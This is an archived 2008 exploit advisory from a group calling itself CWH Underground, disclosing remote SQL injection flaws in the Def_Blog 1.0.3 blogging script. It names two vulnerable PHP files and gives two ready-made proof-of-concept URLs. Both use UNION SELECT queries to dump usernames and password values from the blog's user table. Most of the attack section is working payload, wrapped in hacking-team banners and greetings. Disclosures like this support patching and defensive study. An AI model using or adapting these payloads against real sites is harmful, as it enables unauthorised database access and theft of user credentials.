TUCoPS :: Web :: Blogs :: bx3776.htm

Def_Blog 1.0.3 Multiple Remote SQL Injection Vulnerabilities
Def_Blog 1.0.3 Multiple Remote SQL Injection Vulnerabilities
Def_Blog 1.0.3 Multiple Remote SQL Injection Vulnerabilities


=================================================================0D
  Def_Blog 1.0.3 Multiple Remote SQL Injection Vulnerabilities=0D
=================================================================0D
=0D
  ,--^----------,--------,-----,-------^--,=0D
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..=0D
  `+---------------------------^----------|=0D
    `\_,-------, _________________________|=0D
      / XXXXXX /`|     /=0D
     / XXXXXX /  `\   /=0D
    / XXXXXX /\______(=0D
   / XXXXXX /           =0D
  / XXXXXX /=0D
 (________(             =0D
  `------'=0D
=0D
=0D
AUTHOR : CWH Underground=0D
DATE   : 16 July 2008=0D
SITE   : cwh.citec.us=0D
=0D
=0D
#####################################################=0D
 APPLICATION : Def_Blog=0D
 VERSION     : 1.0.3=0D
DOWNLOAD : http://www.easy-script.com/Def_Blog_V.1.0.3.zip=0D 
#####################################################=0D
=0D
-- Remote SQL Injection ---=0D
=0D
-----------------=0D
 Vulnerable File=0D
-----------------=0D
=0D
[+] comaddok.php=0D
[+] comlook.php=0D
=0D
=0D
-------------=0D
 POC Exploit=0D
-------------=0D
=0D
[+] http://[Target]/[def_blog_path]/comaddok.php?article=-1+union+select+1,concat(pseudo,0x3a3a,mdp)+from+def_user--=0D 
[+] http://[Target]/[def_blog_path]/comlook.php?article=-1+union+select+1,2,3,4,concat(pseudo,0x3a3a,mdp),6,7+from+def_user--=0D 
=0D
=0D
#####################################################################=0D
 Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos   =0D
 Special Thx : asylu3, citec.us=0D
#####################################################################=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH